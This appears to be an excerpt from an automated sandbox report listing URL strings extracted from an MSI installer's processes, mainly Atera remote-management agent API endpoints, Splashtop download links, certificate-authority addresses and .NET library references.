                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
                                Source: NLog.dll.24.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: xdnup.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                                Source: xdnup.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: xdnup.dll.1.drString found in binary or memory: http://sv.symcd.com0&
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://wixtoolset.org
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                                Source: AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPSp
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPSstem
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                                Source: AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                                Source: AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                                Source: xdnup.dll.1.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: xdnup.dll.1.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.P
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.PH
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.Pjo
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Prh(
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Pro
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting)
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurrin
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackagesseTasH
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Trace
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiComm
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F523000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
                                Source: rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
                                Source: System.Private.CoreLib.dll.1.drString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                                Source: System.Diagnostics.EventLog.dll.24.dr, System.Private.CoreLib.dll.1.drString found in binary or memory: https://aka.ms/binaryformatter
                                Source: System.Private.CoreLib.dll.1.drString found in binary or memory: https://aka.ms/dotnet-illink/com
                                Source: System.Diagnostics.EventLog.dll.24.drString found in binary or memory: https://aka.ms/dotnet-warnings/
                                Source: System.Diagnostics.EventLog.dll.24.drString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
                                Source: xdnup.dll.1.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: xdnup.dll.1.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0BD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.0.exe
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: Microsoft.Win32.TaskScheduler.dll0.24.drString found in binary or memory: https://github.com/dahall/taskscheduler
                                Source: System.Diagnostics.DiagnosticSource.dll1.24.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                                Source: System.Diagnostics.DiagnosticSource.dll1.24.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                                Source: System.IO.FileSystem.Primitives.dll.1.dr, System.IO.IsolatedStorage.dll.1.dr, System.Security.Cryptography.Cng.dll.1.dr, System.Reflection.Emit.dll.1.dr, System.Xml.XDocument.dll.1.dr, System.Private.DataContractSerialization.dll.1.dr, Microsoft.CSharp.dll.1.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Diagnostics.EventLog.dll.24.dr, System.Threading.Tasks.Dataflow.dll.1.dr, System.Text.Encodings.Web.dll0.24.dr, System.Reflection.Primitives.dll.1.dr, System.Data.Common.dll.1.dr, System.Runtime.Serialization.Json.dll.1.drString found in binary or memory: https://github.com/dotnet/runtime
                                Source: System.Threading.Tasks.Dataflow.dll.1.drString found in binary or memory: https://github.com/dotnet/runtimew
                                Source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                                Source: LiteDB.dll.24.drString found in binary or memory: https://github.com/mbdavid/LiteDB
                                Source: System.Data.Common.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1187
                                Source: Microsoft.CSharp.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1416.
                                Source: Microsoft.CSharp.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1906.
                                Source: System.Data.Common.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1981
                                Source: System.Private.CoreLib.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/378
                                Source: System.Private.CoreLib.dll.1.drString found in binary or memory: https://github.com/mono/linker/pull/649
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A096000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com/csrs/win
                                Source: NLog.dll.24.drString found in binary or memory: https://nlog-project.org/
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/a
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/ag
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageA
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAg
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAge
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.z
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.zip
